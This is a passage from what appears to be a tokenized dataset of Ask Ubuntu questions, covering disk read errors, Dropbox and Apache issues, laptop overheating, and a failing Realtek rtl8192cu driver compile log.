8129.327800 ] sd 7:0:0:0 : [ sdb ] [ 8129.327802 ] sense key : medium error [ current ] [ 8129.327808 ] sd 7:0:0:0 : [ sdb ] [ 8129.327811 ] add . sense : unrecovered read error [ 8129.327814 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8129.327816 ] read ( 10 ) : 28 00 50 bd 22 48 00 00 b8 00 [ 8129.327828 ] end_request : critical target error , dev sdb , sector 1354572360 [ 8130.720885 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584395 : block 158335048 : comm io_worker : unable to read itable block [ 8130.721034 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584658 : block 158335065 : comm io_worker : unable to read itable block [ 8134.249966 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8134.249973 ] sd 7:0:0:0 : [ sdb ] [ 8134.249977 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8134.249979 ] sd 7:0:0:0 : [ sdb ] [ 8134.249982 ] sense key : medium error [ current ] [ 8134.249987 ] sd 7:0:0:0 : [ sdb ] [ 8134.249990 ] add . sense : unrecovered read error [ 8134.249994 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8134.249996 ] read ( 10 ) : 28 00 50 bd 22 50 00 00 b0 00 [ 8134.250008 ] end_request : critical target error , dev sdb , sector 1354572368 [ 8135.178003 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584418 : block 158335050 : comm io_worker : unable to read itable block [ 8138.972126 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8138.972133 ] sd 7:0:0:0 : [ sdb ] [ 8138.972136 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8138.972139 ] sd 7:0:0:0 : [ sdb ] [ 8138.972141 ] sense key : medium error [ current ] [ 8138.972146 ] sd 7:0:0:0 : [ sdb ] [ 8138.972150 ] add . sense : unrecovered read error [ 8138.972154 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8138.972156 ] read ( 10 ) : 28 00 50 bd 22 50 00 00 b0 00 [ 8138.972168 ] end_request : critical target error , dev sdb , sector 1354572368 [ 8142.460239 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8142.460246 ] sd 7:0:0:0 : [ sdb ] [ 8142.460249 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8142.460252 ] sd 7:0:0:0 : [ sdb ] [ 8142.460254 ] sense key : medium error [ current ] [ 8142.460259 ] sd 7:0:0:0 : [ sdb ] [ 8142.460263 ] add . sense : unrecovered read error [ 8142.460266 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8142.460268 ] read ( 10 ) : 28 00 50 bd 22 58 00 00 a8 00 [ 8142.460281 ] end_request : critical target error , dev sdb , sector 1354572376 [ 8143.386275 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584453 : block 158335052 : comm io_worker : unable to read itable block [ 8147.171383 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8147.171390 ] sd 7:0:0:0 : [ sdb ] [ 8147.171393 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8147.171396 ] sd 7:0:0:0 : [ sdb ] [ 8147.171398 ] sense key : medium error [ current ] [ 8147.171404 ] sd 7:0:0:0 : [ sdb ] [ 8147.171407 ] add . sense : unrecovered read error [ 8147.171410 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8147.171413 ] read ( 10 ) : 28 00 50 bd 22 50 00 00 b0 00 [ 8147.171425 ] end_request : critical target error , dev sdb , sector 1354572368 [ 8150.660513 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8150.660522 ] sd 7:0:0:0 : [ sdb ] [ 8150.660527 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8150.660532 ] sd 7:0:0:0 : [ sdb ] [ 8150.660535 ] sense key : medium error [ current ] [ 8150.660543 ] sd 7:0:0:0 : [ sdb ] [ 8150.660548 ] add . sense : unrecovered read error [ 8150.660553 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8150.660556 ] read ( 10 ) : 28 00 50 bd 22 58 00 00 a8 00 [ 8150.660576 ] end_request : critical target error , dev sdb , sector 1354572376 [ 8151.453526 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584471 : block 158335053 : comm io_worker : unable to read itable block i 'm not very good at hardware.could someone please explain in some few words what this means and what can i do to fix it
470022	show `` open with ... '' dialogue using a command	is there a way to show nautilus ' or thunar 's ( or whatever ) `` open with ... '' dialogue directly from the commandline ? i am using mucommander and need to open files with non-default applications once in a while . i use ubuntu 14.04 .
470024	dropbox problems	this is not a question . but i do n't have permissions to comment on other questions , so i will do this to contribute . dropbox fails to start with `` verificationerror : importing pylinux ... '' in the linked question about dropbox problems , i encountered the same thing . i have just now upgraded from 13.10 to 14.04 and dropbox would n't work . the suggested answer did n't work for me . removing and re-installing dropbox did n't work either . however , after first doing the steps in the suggested answer of the linked question , and then uninstalling and re-installing dropbox , i did get it to work . additionally , i was a bit stupid . so i accidentally started dropbox with sudo dropbox start . then i realized my mistake and stopped the daemon and tried to start it with my own user , but then i got even more error messages . and at that point , the suggested solution in the linked question did n't work either . i 'm not sure if this is a good way to do it , but i solved my final problems by recursively changing owner to everything in my home directory : sudo chown -r username : groupname ~ hope this could help someone .
470025	acer aspire one runs ubuntu 14.04 slow	i own a acer aspire one that has previously run slow on microsoft 7 , then on microsoft xp . it now runs ubuntu 14.04 and it 's just as lagging . i 'm currently wondering whether the machine is too old or too damaged to run 2009-up technology ? has anyone encountered this ? shud i try an earlier version of ubuntu ? my machine ( netbook ) has an intel atom dual core processor and 2gb ram . thanks , ps > i 'm new to ubuntu , it 's the first time i 'm using it and want to learn .
470028	documentroot is password protected but no htaccess file ?	at some point i pw protected /var/www/ for security purposes ( my actual hosted websites are located in a different path ) , now i would like to host something publicly in /var/www/ but do not know how to remove the pw protection . there is no .htaccess file present in the directory or the parent . what other ways could the directory be protected ? some sort of apache config file ?
470032	ubuntu download errors ?	i am questioning a lot today , but now i seriously need this . i needed to reinstall ubuntu cause i did n't left space for storing files on my usb drive . i formated it , but when i try to add ubuntu to my usb drive with that program , it says copy failed , copy failed and just errors . if i try to boot with it , black screen and some long white text appears , something with grub in it and you can type commands . i tried typing some commands , there was a help bar . i was keep getting more and more errors ( i ca n't pick screenshots cause i ca n't access get in with it ) it 's hard to remember , but that 's not the point . i checked the iso file with poweriso and saw that it 's 21 % for some reason , the file size is 2 megabytes less . i tried reinstalling with different browsers and even devices ! what ? i tried adding a 32-bit to virtualbox and it booted up very slowly , but it did . i think something is wrong with the download ( i tried redownloading a ton of times , trust me )
470040	how to customize or debug ad-blocking on gnome-web ( epiphany-browser ) ?	gnome-web ( new name for epiphany browser ) have a ad-blocking feature , which is by default activated . but sometimes , i get the impression that elements that are not ads are blocked ( false positives ) , that some ads from a particular country are not blocked . also , after installing gnome-3.12 from ppa gnome-team/staging , ad-blocking completely stopped working . what is the principle of the filter implemented in gnome-web ? how can i troubleshoot/debug ad-blocking ? can i configure the blocking patterns ?
470044	what is meant by anqp server/advertisement server in case of hotspot	what is meant by anqp server/advertisement server in case of hotspot ? and how to configure anqp server . could any body let me know ? thanks inadvance
470045	upgrading ubuntu 10.04 lts lucid lynx to 12.04	does upgrading ubuntu also upgrades the kernel ? or is better to remove old ubuntu and install latest one because i want latest updated version of linux os for compiling vlc android project
470049	how can i make a folder in a pen-drive using terminal ?	i had opened a pen-drive in my system and i thought to open my pen-drive from terminal and copy the needed file from system to pen-drive from terminal only . but i was wondering how i can do that . can you please suggest me procedure for doing the same ?
470052	how to bind ctrl to caps lock for full screen games ( dota 2 )	i 'm using /etc/default/keyboard to make my caps lock key the ctrl key . however , when i play dota 2 this binding does n't take effect . what method do i use so that this binding holds even when playing full screen games ? i 'm on xubuntu 12.04 .
470055	playonlinux - steam - chivalry medieval warfare - microsoft vc redist loop	i recently switched to ubuntu and so far i think it is amazing ! i am trying to run the game chivalry medieval warfare on a windows client of steam through wine/playonlinux . the game downloaded okay but when i press play it takes me to the `` first time setup '' window because it wants to install microsoft vc redist . the window abruptly closes after about 8 minutes , with no results . this happens over and over and i can not get past the first time setup . i installed these components in pol : dxfullsetup dotnet40 presumable that is what it is trying to download . if i look in the chivalry local files there is an setup file for dotnet 4.5. which is n't listed in pol . someone said that adding a override for d3dx11 in wine and setting it to disable . that did not solve my problem . does anyone have any insights into this matter ? i want to avoid duel booting if possible . i can do that if it comes down to it , assuming it 's possible to duel boot windows 7 even when ubuntu was there first
470056	host to host ssh tunnel	i want to create a full ssh tunnel between two ubuntu 12.04 servers , ( i found out about sshuttle but because of a bug in the handling of file descriptors it will crash under high load ) very much like ipsec but because i need it only for two hosts the complexity of creating a full fledged ipsec configuration looks to be an overkill . what i want to achieve is that all the data going between server1 and server2 will be encrypted without needing to create thousand of ssh dynamic ports .
470058	is there a native gnome application to view ebooks ?	is there a native gnome ( preferably gnome 3 ) application for viewing ebooks ? i 've heard about plans for a gnome-books application in this blog post , what about it ? when might such an application become available ?
470059	server/nas server/ ? ? ?	i 'm looking for an operating system to put on a second hand web server i have just bought , i am wanting primarily to use the server as a humongous nas with raid facilities to avoid loosing all my mp3 ect , i believe it 's raid 5 ? ? mirroring ? ? redundant ? ? i also want to play about abit with remote desktop ect but have no experience with linux or ubuntu . is there a version that would suit an amateur to accomplish all of the above and someone who wishes to learn , and play with remote desktop ? ? i pick android stuff quite quickly , are there any similarities ? ? thanks in advance . dan
470063	problem with installation matlab	i want to install maltab to 32-bit version , so i follow the instructions , and i have write this command sudo /media/mathworks_r2012a/install -glnx86 -v but it give me sudo : /media/mathworks_r2012a/install : command not found , so what is the solution of this problem .
470065	google chrome address bar font has gone too large , how can we reduce it	running unity on my desktop ( 2*20 '' lcd displays ) , i initiated a standard daily update on my ubuntu 14.04 lts today and google chrome updated itself to version 35.0.1916.114 . the url address bar input now shows imo a too larger font size which then proceeds to auto show in green . i prefer the smaller font size and have no need for 'gooey slime green ' auto complete font colours . any advice on how to revert back to smaller , generic address font styling . i use both ff and chrome for numerous tasks , chrome being my primary browser and i 've checked my system unity 'default ' theme ( ambiance ! lol.. yes i 'm tired of that also ) . thanks for sharing .
470066	workspace area stretches into menu bar	i am running 14.04 unity , i may have accidentally knocked my keyboard the other day ( triggered keyboard shortcut but i ca n't find anything like this ? ) and now my workspace is stretching into the menu bar at the top of my session , cutting off my browser tabs when windows are maximised etc . tried web searches and found plenty about missing menu bars , how to hide etc , but nothing that covers my problem . please help . as per screenshot below you can see current tab just starting on the right edge of the address bar . http : //i.imgur.com/zvntxss.png better example http : //i.imgur.com/7aykckg.png
470071	xfce4 create new document , remove history	i 'm on xubuntu 14.04 . 64 bit . i 'm not sure about the xfce version i 'm using . i had kinda the same problem on 13.10 , it hunts me on 14.04 and upgrading does n't seem to work . when i click right click , if go over ( even by mistake ) to create new document , the computer freezes for a while i think i know why , it tries to search for previously edited files how to disable that feature forever ? by the way i uninstalled the default editor , abiword i think . i disabled everything here , did n't solve it i just want to disable the right click menu from searching to previously edited files . i do n't want that feature .
470072	gufw does not open in ubuntu 14.04	i 'm using remote desktop manager to access another system which uses ubuntu 14.04 with xfce 4.10 desktop . i recently installed gufw . when i click it from application menu\systems , it does not open . update : when i try to open it in terminal it just says `` hangup '' . update 2 : i tried to open gufw directly ( without remote desktop ) . it was opened . so , the problem is that gufw ca n't be opened through remote desktop and xfce desktop .
470074	critical temperature reached for thermal thermal_zone0	i have my laptop ( dell vostro 3350 ) overheating using ubuntu ( starting from 11.04 upto 14.04 distributives ) . in syslog i found the record when shutdown is occured : may 21 11:43:43 mobiled2 kernel : [ 20400.290337 ] thermal thermal_zone0 : critical temperature reached ( 100 c ) , shutting down i tried to solve this problem using monitoring temperature from such sensor and throttle cpu frequency to prevent overheating . i wrote small tool ( throttletemp ) which reads temperature from sensors files and reduce cpu frequency depends from it . tool reports temperatures to syslog also . here the list of sources : acpi tz = /sys/class/thermal/thermal_zone0/temp pkg temp = /sys/class/thermal/thermal_zone1/temp acpi tz = /sys/class/hwmon/hwmon0/temp1_input physical = /sys/class/hwmon/hwmon1/device/temp1_input core 0 = /sys/class/hwmon/hwmon1/device/temp2_input core 1 = /sys/class/hwmon/hwmon1/device/temp3_input tool shows me following temperatures before shutdown : may 21 11:43:43 mobiled2 throttletemp [ 8768 ] : acpi tz temperature : 71.500000 may 21 11:43:43 mobiled2 throttletemp [ 8768 ] : pkg temp temperature : 75.000000 may 21 11:43:43 mobiled2 throttletemp [ 8768 ] : acpi tz temperature : 71.500000 may 21 11:43:43 mobiled2 throttletemp [ 8768 ] : physical temperature : 74.000000 may 21 11:43:43 mobiled2 throttletemp [ 8768 ] : core 0 temperature : 71.000000 may 21 11:43:43 mobiled2 throttletemp [ 8768 ] : core 1 temperature : 71.000000 so , before shutdown /sys/class/thermal/thermal_zone0/temp shows me 71.5 degrees , but kernel says what 100 degrees was reached . it seems what temperature read from this sensor is not the same what used kernel to report overheating message . i am interested in how can i read temperature used by kernel to report that message to syslog ? it can be on system level or in programming way using c language .
470077	error in compiling rtl8192 cu driver	rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/circ_buf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/basic_types.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_hal.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/ip.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_led.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/if_ether.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/xmit_osdep.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_sreset.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_mp.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_ioctl.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/drv_types_sdio.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/ifcfg-wlan0 rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/makefile rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/kconfig rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_intf.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_cmd.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_phycfg.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_xmit.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_dm.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_mp.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rxdesc.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rf6052.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_led.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_halinit.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_recv.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg_wowlan.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_ce.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_linux.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_xmit.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_xp.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_sreset.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_hal_init.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_com.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/halpwrseqcmd.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/clean rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 authentication requested [ root ] for make clean : rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr rm -fr module.markers ; rm -fr modules.order cd core/efuse ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd core ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c/usb ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : make arch=x86_64 cross_compile= -c /lib/modules/3.13.0-24-generic/build m=/home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-24-generic' cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_cmd.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_security.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_debug.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_io.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_query.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_set.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ieee80211.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme_ext.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_wlan_util.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_pwrctrl.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_rf.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_recv.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sta_mgt.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ap.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_xmit.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_p2p.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_tdls.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_br_ext.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_iol.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sreset.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/efuse/rtw_efuse.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_intf.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_com.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_hal_init.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_phycfg.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rf6052.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_dm.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rxdesc.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_cmd.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_halinit.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_led.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_xmit.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_recv.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_linux.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_sreset.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_xmit.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/osdep_service.o cc [ m ] /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c : in function ‘rtw_proc_init_one’ : /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:3 : error : implicit declaration of function ‘create_proc_entry’ [ -werror=implicit-function-declaration ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:11 : warning : assignment makes pointer from integer without a cast [ enabled by default ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:3 : error : implicit declaration of function ‘create_proc_read_entry’ [ -werror=implicit-function-declaration ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:326:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` log_level '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:332:8 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_log_level ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:348:21 : warning : assignment makes pointer from integer without a cast [ enabled by default ] padapter- > dir_dev = create_proc_entry ( dev- > name , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:379:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` write_reg '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:385:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_write_reg ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:387:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` read_reg '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:393:7 : error : dereferencing pointer to incomplete type entry- > write_proc = 